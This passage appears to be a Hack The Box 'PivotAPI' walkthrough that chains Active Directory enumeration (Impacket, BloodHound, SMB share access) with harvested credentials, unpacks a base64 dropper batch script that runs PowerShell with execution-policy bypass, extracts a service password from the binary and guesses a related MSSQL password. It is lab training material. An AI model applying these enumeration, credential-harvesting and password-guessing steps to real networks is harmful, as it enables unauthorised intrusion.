-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
Attempt the attack:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -dc-ip $ip1 LicorDebellota.htb/kaorz:Roper4155
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
No entries found!
This shows the user is not associated with any SPN.
Attempt to obtain database credentials
Looking at the scanned ports again, the database service is also relevant to credential access. It too can be used with a Python script from the impacket framework:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# locate -i mssqlcli
/pentest/impacket/build/scripts-3.11/mssqlclient.py
/pentest/impacket/examples/mssqlclient.py
/usr/local/bin/__pycache__/mssqlclient.cpython-311.pyc
/usr/local/bin/mssqlclient.py
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/mssqlclient.py
/usr/share/doc/python3-impacket/examples/mssqlclient.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# ln -s /usr/share/doc/python3-impacket/examples/mssqlclient.py /usr/bin/mssqlclient.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-show] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
TDS client implementation (SSL supported).
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-show show the queries
-file FILE input file with commands to execute in the SQL shell
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py LicorDebellota.htb/kaorz:Roper4155@$ip1
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
The connection fails, indicating this user has no permission to connect to the database.
Attempt to find more potential attack paths
Having tried all the known ports without success, we can use bloodhound to explore further potential attack paths.
Bloodhound uses leaked credentials and relationship data from the domain to build a domain graph that shows privilege relationships and attack paths. By collecting information, identifying domain users, groups, computers and their relations, and assessing domain policies and permissions, it helps security teams spot potential attack paths and weaknesses.
Because we already hold a credential, besides the main program we also need the matching domain collector, a Python script built on the impacket framework:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt search bloodhound
Sorting... Done
Full Text Search... Done
bloodhound/kali-rolling,now 4.3.1-0kali2 amd64 [installed]
Six Degrees of Domain Admin
bloodhound-dbgsym/kali-rolling 4.3.1-0kali2 amd64
debug symbols for bloodhound
bloodhound.py/kali-rolling,kali-rolling 1.7.2-0kali1 all
ingestor for BloodHound, based on Impacket (Python 3)
ruby-rails-assets-corejs-typeahead/kali-rolling,kali-rolling 1.2.1-3 all
Fast and fully-featured autocomplete search library
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt-get install bloodhound.py
Before launching the tool, initialise its database in a separate terminal window:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# neo4j restart
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:30626). It is available at http://localhost:7474
There may be a short delay until the server is ready.
Initialisation succeeded and a web interface is available; the default username and password are both neo4j, and you are prompted to change the password after logging in.
Make sure the following ports are available:
Finally, back in the main window, run the command bloodhound.
The UI is blank at first, which is normal because no data has been imported yet. Exit, then run the bloodhound collector with the credential we obtained to gather more domain information:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# bloodhound-python -c ALL -u kaorz -p Roper4155 -d LicorDebellota.htb -dc LicorDebellota.htb -ns 10.129.228.115 --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 58S
INFO: Compressing output into 20240128095527_bloodhound.zip
A lot of information was collected, confirming the credential is valid; the result is packed into a .zip.
The archive is imported without unpacking, but to preview its contents first, run:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# unzip -l 20240128095527_bloodhound.zip
Archive: 20240128095527_bloodhound.zip
Length Date Time Name
--------- ---------- ----- ----
5988 2024-01-28 09:55 20240128095527_gpos.json
69252 2024-01-28 09:55 20240128095527_users.json
27439 2024-01-28 09:55 20240128095527_containers.json
94348 2024-01-28 09:55 20240128095527_groups.json
3164 2024-01-28 09:55 20240128095527_domains.json
4465 2024-01-28 09:56 20240128095527_computers.json
1672 2024-01-28 09:55 20240128095527_ous.json
--------- -------
206328 7 files
Then import it into the main program for analysis by clicking upload data in the top right:
Refresh the database and the collected information appears. Then search for the user we obtained and mark it as owned:
Once selected, the user shows a skull icon. Clicking the user shows its node info, and this user has no control over any target:
Under analysis, choosing shortest paths from owned principals also returns nothing, and the other views show nothing exploitable either.
Retry enumerating SMB shares
Initially we tried to list SMB shares anonymously and failed, but now that we hold a user credential we can retry:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbmap -H $ip1 -u kaorz -p Roper4155
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.228.115:445 Name: PivotAPI.LicorDeBellota.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
SYSVOL READ ONLY Recurso compartido del servidor de inicio de sesión
# Shares are listed and some are readable; try accessing them
# If `smbmap` returns no shares, try tools such as `crackmapexec`
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/IPC$
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> quit
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/NETLOGON
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 18:42:28 2020
.. D 0 Sat Aug 8 18:42:28 2020
HelpDesk D 0 Sun Aug 9 23:40:36 2020
5158399 blocks of size 4096. 1027960 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Sun Aug 9 23:40:36 2020
.. D 0 Sun Aug 9 23:40:36 2020
Restart-OracleService.exe A 1854976 Fri Feb 19 18:52:01 2021
Server MSSQL.msg A 24576 Sun Aug 9 19:04:14 2020
WinRM Service.msg A 26112 Sun Aug 9 19:42:20 2020
5158399 blocks of size 4096. 1027959 blocks available
smb: \HelpDesk\> prompt off
smb: \HelpDesk\> mget *
parallel_read returned NT_STATUS_IO_TIMEOUT
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (20.8 KiloBytes/sec) (average 20.8 KiloBytes/sec)
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (25.9 KiloBytes/sec) (average 23.2 KiloBytes/sec)
smb: \HelpDesk\> quit
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/SYSVOL
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 08:59:02 2020
.. D 0 Sat Aug 8 08:59:02 2020
LicorDeBellota.htb Dr 0 Sat Aug 8 08:59:02 2020
5158399 blocks of size 4096. 1027797 blocks available
smb: \> cd LicorDeBellota.htb\
smb: \LicorDeBellota.htb\> ls
. D 0 Sat Aug 8 09:00:44 2020
.. D 0 Sat Aug 8 09:00:44 2020
DfsrPrivate DHSr 0 Sat Aug 8 09:00:44 2020
Policies D 0 Sat Aug 8 21:45:40 2020
scripts D 0 Sat Aug 8 18:42:28 2020
5158399 blocks of size 4096. 1027797 blocks available
Then walk through each directory in turn and download the files most likely to be valuable; in the end only the three files in NETLOGON were downloaded:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip ftp Kaorz_hash nmapscan pdf_authors pivotapi.pdf Restart-OracleService.exe 'Server MSSQL.msg' users_list 'WinRM Service.msg'
# If downloading the binary fails, use this alternative:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbget -U kaorz%Roper4155 smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Using domain: WORKGROUP, user: kaorz
[Restart-OracleService.exe] 62.50kB of 1.77MB (3.45%) at 2.98kB/s ETA: 00:09:47
[Restart-OracleService.exe] 562.50kB of 1.77MB (31.05%) at 9.53kB/s ETA: 00:02:115
smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Downloaded 1.77MB in 171 seconds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls -liah
total 17M
4750478 drwxr-xr-x 4 root root 4.0K Jan 28 23:10 .
4729383 drwxr-xr-x 3 root root 4.0K Jan 28 09:59 ..
4763356 -rw-r--r-- 1 root root 203K Jan 28 09:56 20240128095527_bloodhound.zip
5012685 drwxr-xr-x 3 root root 4.0K Jan 15 16:51 ftp
4763218 -rw-r--r-- 1 root root 567 Jan 27 23:31 Kaorz_hash
4870101 drwxr-xr-x 2 root root 4.0K Jan 15 15:36 nmapscan
4729293 -rw-r--r-- 1 root root 35 Jan 27 16:13 pdf_authors
4652927 -rw-r--r-- 1 cvestone cvestone 14M Jan 14 22:32 pivotapi.pdf
4751922 -rwxr-xr-x 1 root root 1.8M Jan 28 23:13 Restart-OracleService.exe
4763357 -rw-r--r-- 1 root root 59K Jan 28 10:37 'Server MSSQL.eml'
4763351 -rw-r--r-- 1 root root 24K Jan 28 10:29 'Server MSSQL.msg'
4728636 -rw-r--r-- 1 root root 79 Jan 27 22:20 users_list
4763358 -rw-r--r-- 1 root root 64K Jan 28 10:37 'WinRM Service.eml'
4763355 -rw-r--r-- 1 root root 26K Jan 28 10:29 'WinRM Service.msg'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file *.msg
Server MSSQL.msg: CDFV2 Microsoft Outlook Message
WinRM Service.msg: CDFV2 Microsoft Outlook Message
# Searching for how to read Outlook Message files shows that the following tool converts the format
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# msgconvert *.msg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip Kaorz_hash pdf_authors Restart-OracleService.exe 'Server MSSQL.msg' 'WinRM Service.eml'
ftp nmapscan pivotapi.pdf 'Server MSSQL.eml' users_list 'WinRM Service.msg'
# They are converted to `.eml`, which can be opened with mousepad, shipped with Kali
Analysing the e-mails
With an e-mail file in hand, the first thing to identify is the sender and recipient accounts
Server MSSQL.eml:
Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094600.F3AEBbC1.58748
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>
--17064094600.F3AEBbC1.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Good afternoon,
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
Any doubt do not hesitate to contact us.
Greetings,
The HelpDesk Team
--17064094600.F3AEBbC1.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64
e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs
Cg17XGYwXGZzd2lzc1xmY2hhcnNldDAgQXJpYWw7fQoNe1xmMVxmbW9kZXJuIENvdXJpZXIgTmV3
O30KDXtcZjJcZm5pbFxmY2hhcnNldDIgU3ltYm9sO30KDXtcZjNcZm1vZGVyblxmY2hhcnNldDAg。。。。。
The body of this message says that because of problems with the Oracle database installed in 2010, a decision was made in 2020 to migrate to MSSQL, and that a program was written to log in to Oracle and restart it. The mail calls it "Reset-Service.exe", while the file we pulled from the share is Restart-OracleService.exe; the name differs, but the purpose matches. This is an operations notice, exactly the kind of information worth remembering.
Next, WinRM Service.eml:
Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094601.94Ba595C.58748
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>
--17064094601.94Ba595C.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Good afternoon.
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,
The HelpDesk Team
--17064094601.94Ba595C.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64
e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs。。。。。
The body says a rule was created to stop exposing the WinRM service and that outbound TCP, UDP and even ICMP have been blocked, so no ICMP-type shells can be used either. This is equally important; keep it in mind.
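As an added example (this is not from the original notes), the triage done by hand on the two messages above, in Python with the standard library's email parser: it reads the headers, walks the multipart body to the text/plain part (skipping the RTF alternative), and harvests addresses, their local parts as candidate user names, executable names and years mentioned, which is what feeds a user list and a password-pattern guess later. The message embedded below is constructed from the Server MSSQL mail above with the RTF part left out.

```python
import email
import re
from email import policy

# Constructed sample modelled on "Server MSSQL.eml" above; the base64 RTF part is omitted.
SAMPLE_EML = """\
Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094600.F3AEBbC1.58748
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>

--17064094600.F3AEBbC1.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Good afternoon,
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
Greetings,
The HelpDesk Team
--17064094600.F3AEBbC1.58748--
"""

ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")
EXE_RE = re.compile(r"\b[\w-]+\.(?:exe|dll|ps1|bat|msi)\b", re.I)
YEAR_RE = re.compile(r"\b(?:19|20)\d{2}\b")


def text_body(msg):
    """Return the first text/plain part, ignoring HTML/RTF alternatives."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            return part.get_content()
    return ""


def triage_eml(raw):
    """Headers plus the indicators a pentester wants from a harvested mail."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = text_body(msg)
    headers = " ".join(str(msg.get(h, "")) for h in ("From", "To", "Cc", "Reply-To"))
    addresses = sorted(set(ADDR_RE.findall(headers + " " + body)))
    return {
        "date": str(msg.get("Date", "")),
        "subject": str(msg.get("Subject", "")),
        "addresses": addresses,
        "usernames": sorted({a.split("@", 1)[0] for a in addresses}),  # candidate AD names
        "files": sorted(set(EXE_RE.findall(body))),                  # tooling named in the mail
        "years": sorted(set(YEAR_RE.findall(body))),                 # feed for password patterns
        "body": body.strip(),
    }


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_EML
    for key, value in triage_eml(raw).items():
        if key != "body":
            print(f"{key:10}: {value}")
```

Run it with a converted file as the argument (`python3 triage.py 'Server MSSQL.eml'`); without one it runs on the embedded sample. The years list is what later makes the 2010/2020 suffix of the service passwords recognisable.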
Analysing program 1
Check the exact type of the executable:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file Restart-OracleService.exe
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections
It is a 64-bit Windows PE executable. Next, look at the printable strings in the program; together with `file`, this is the basic first step of analysing any binary
# Count the lines and write them to a separate file
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | wc -l
23671
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | tee strings_Restart-Oracle
Skim the file for sensitive data or key logic strings that could be useful; what eventually stands out is:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat strings_Restart-Oracle| grep inf
inflate 1.2.11 Copyright 1995-2017 Mark Adler
ChatGPT can be asked what this means (not always reliable, but usable for a first pass; a search engine is usually more trustworthy). It is the copyright string of zlib's inflate (decompression) routine, so the binary carries code to unpack something at run time; on its own that gives no angle of attack yet.
Also look at dynamically linked libraries:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ldd Restart-OracleService.exe
not a dynamic executable
# ldd only understands ELF binaries, so this tells us nothing about a PE; its imports have to be read from the PE import table with a PE-aware tool
After this initial static analysis, IDA or Ghidra can be used for a deeper look, but even the decompiled code is hard to read: there is no clear program logic and many functions look meaningless, which suggests the program is packed or obfuscated. Static analysis is difficult, so try dynamic analysis, in an isolated analysis VM with no access to anything sensitive, since the program is going to be executed.
Monitoring processes and the registry:
For a first dynamic look, Microsoft's Sysinternals suite is normally used; download it from https://learn.microsoft.com/zh-cn/sysinternals/downloads
First use procmon to capture the process, registry and file activity while the program runs:
Set up filters first, to avoid too much noise:
Then start capturing, run the program, clear, and repeat this at least three times, checking that the event count shown at the bottom left is about the same each time, so we know the program really ran to completion.
During this, the program's behaviour repeatedly shows a flow like the following:
This is clearly more interesting than the other registry reads of system configuration: a batch script is created to run some commands and is deleted at the end, which is suspicious. The batch file name also differs on every run, so it is presumably generated randomly
We can filter further to focus only on this batch script
Again clear and repeat the step, comparing whether the behaviour matches the previous run; this confirms we captured the program's complete behaviour:
Keeping the file: changing directory permissions
We want to know exactly what the batch script does, but the program deletes it on every run. We can stop the deletion by changing the permissions on the Temp directory:
First disable inheritance:
Then edit the current user's permissions as shown below:
Keeping the file: changing the script's logic
First, analyse the captured .bat script:
@shift /0
@echo off
if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error
:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt
echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe
:error
The script branches on the name of the logged-on user: if it is cybervaca, frankytech or ev4si0n it jumps to the label :correcto, otherwise to :error. Under :correcto the script echoes a long series of base64-encoded (not encrypted) lines into c:\programdata\oracle.txt, then writes a one-line PowerShell script, monta.ps1, that joins the lines, strips the spaces and base64-decodes the result into a new program at c:\programdata\restart-service.exe; that program is run and then deleted together with the helper files. The user-name check is only a guard against running on the wrong machine, not a protection, since we control the script text. We can slightly modify the batch script so it keeps the new program for analysis:
@shift /0
@echo off
goto correcto
goto error
:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt
echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
:error
Running the modified .bat, the related files are captured:
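As an added example, not code from the notes or from the box, here is a way to get the same binary without ever running the dropper: parse the captured .bat offline, rebuild the carrier file from the echo lines exactly as cmd would (a single > truncates, >> appends), read the carrier and output paths from the PowerShell decoder line, and base64-decode. The .bat embedded below is a constructed stand-in of the same shape, with a fake MZ-only payload in place of the real 1.8 MB one, so it runs anywhere.

```python
import base64
import re
import textwrap

# Constructed stand-in for the real 1.8 MB payload: a fake "PE" that only carries the MZ
# magic, so the example runs offline. Nothing here is the dropper's real content.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56 + b"constructed payload, not a real PE"
_B64 = base64.b64encode(FAKE_PE).decode()

# Same shape as the captured .bat above: a user-name gate, echo lines that build the carrier
# file, a one-line PowerShell decoder, then run-and-delete.
SAMPLE_BAT = "\n".join(
    ["@shift /0", "@echo off",
     "if %username% == cybervaca goto correcto",
     "if %username% == frankytech goto correcto",
     "goto error", ":correcto"]
    + [f"echo {chunk} {'>' if i == 0 else '>>'} c:\\programdata\\oracle.txt"
       for i, chunk in enumerate(textwrap.wrap(_B64, 70))]
    + ['echo $salida = $null; $fichero = (Get-Content C:\\ProgramData\\oracle.txt) ; '
       'foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); '
       '[System.IO.File]::WriteAllBytes("c:\\programdata\\restart-service.exe", '
       '[System.Convert]::FromBase64String($salida)) > c:\\programdata\\monta.ps1',
       "powershell.exe -exec bypass -file c:\\programdata\\monta.ps1",
       "del c:\\programdata\\monta.ps1", "del c:\\programdata\\oracle.txt",
       "c:\\programdata\\restart-service.exe",
       "del c:\\programdata\\restart-service.exe", ":error"]
)

ECHO_RE = re.compile(r"^\s*echo\s+(?P<data>.*?)\s*(?P<op>>>?)\s*(?P<target>\S+)\s*$", re.I)
USER_RE = re.compile(r"^\s*if\s+%username%\s*==\s*(?P<user>\S+)\s+goto\b", re.I)
SRC_RE = re.compile(r"Get-Content\s+(?P<src>[^\s)]+)", re.I)
DST_RE = re.compile(r'WriteAllBytes\("(?P<dst>[^"]+)"', re.I)
EXEC_RE = re.compile(r"^\s*(?P<exe>[a-z]:\\\S+\.exe)\s*$", re.I)


def extract_dropper(bat_text):
    """Rebuild the embedded binary from the .bat without executing anything."""
    chunks, allowed, src, dst, exec_path = {}, [], None, None, None
    for line in bat_text.splitlines():
        m = USER_RE.match(line)
        if m:
            allowed.append(m.group("user"))
            continue
        m = ECHO_RE.match(line)
        if m:
            target, data = m.group("target").lower(), m.group("data")
            if m.group("op") == ">":          # a single '>' truncates, exactly as cmd does
                chunks[target] = []
            chunks.setdefault(target, []).append(data)
            s, d = SRC_RE.search(data), DST_RE.search(data)
            if s and d:                        # the PowerShell decoder names carrier and output
                src, dst = s.group("src").lower(), d.group("dst")
            continue
        m = EXEC_RE.match(line)
        if m:
            exec_path = m.group("exe")
    if src is None or src not in chunks:
        raise ValueError("no carrier file referenced by a Get-Content/WriteAllBytes decoder")
    # cmd's `echo X > file` writes the space before '>' as well, hence the script's Replace(" ","")
    payload = base64.b64decode("".join(chunks[src]).replace(" ", ""), validate=True)
    if payload[:2] != b"MZ":
        raise ValueError("decoded carrier is not a PE (no MZ header)")
    return {"allowed_users": allowed, "carrier": src, "written_to": dst,
            "executed": exec_path, "payload": payload}


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_BAT
    info = extract_dropper(text)
    out = "restart-service.extracted.bin"
    with open(out, "wb") as fh:
        fh.write(info["payload"])
    print(f"gate users: {info['allowed_users']}; carrier {info['carrier']} -> {info['written_to']}; "
          f"{len(info['payload'])} bytes written to {out}")
```

Point it at the .bat rescued from Temp (`python3 unpack.py dropper.bat`) and the second-stage binary is reconstructed on the analysis box; nothing from the dropper executes, and the user-name gate is reported rather than satisfied.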
Only the new program is of interest; bring it into Kali and continue the analysis:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file restart-service.exe
restart-service.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings
The program is "stripped to external PDB": its debug symbols were moved into a separate PDB file that we do not have. Look at the strings:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep user
__setusermatherr
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i passw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i kaorz
Deeper static analysis shows the same picture as before: this program also looks packed or obfuscated and is hard to analyse. procmon can again be used for dynamic analysis with the same steps, but this time nothing useful turns up.
Monitoring API calls and their arguments
The above watches the program's behaviour at a coarse level. We can go finer and watch the API calls the program makes while running and the arguments passed to them, looking for sensitive data. For Windows programs API Monitor does this; download link:
http://www.rohitab.com/downloads
Tick all API templates in the left pane, then create a new monitored process and point it at the path of restart-service.exe. From the information gathered earlier we know the sensitive item we are after is a credential, so search the captured calls and parameters for any credential-related keyword. Very quickly we find:
svc_oracle:#oracle_s3rV1c3!2010
This is clearly the Oracle logon credential; store it in its own file
Recall the key operations event from the e-mail: because of problems with the Oracle database installed in 2010, the migration to MSSQL happened in 2020. So this credential may no longer work as is, but credential reuse is possible, and since the password visibly follows a pattern, guessing and brute forcing are options too
Check in bloodhound whether this user still exists, or whether a similar one does:
Another user turns up, for mssql, so the reasonable guess is that the mssql password follows the same rule as the oracle one: s3rV1c3! stays unchanged, while the year (which matches the e-mail) and the prefix (the service name) change to what we know about mssql, i.e.:
svc_mssql:#mssql_s3rV1c3!2020
Check whether the credential is valid:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb $ip1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
SMB 10.129.207.210 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
[*] completed: 100.00% (1/1)
